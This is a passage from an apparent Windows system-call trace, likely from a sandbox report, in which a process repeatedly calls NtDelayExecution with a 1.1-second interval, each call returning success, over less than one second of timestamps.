(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0131.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0132.758] NtDelayExecution 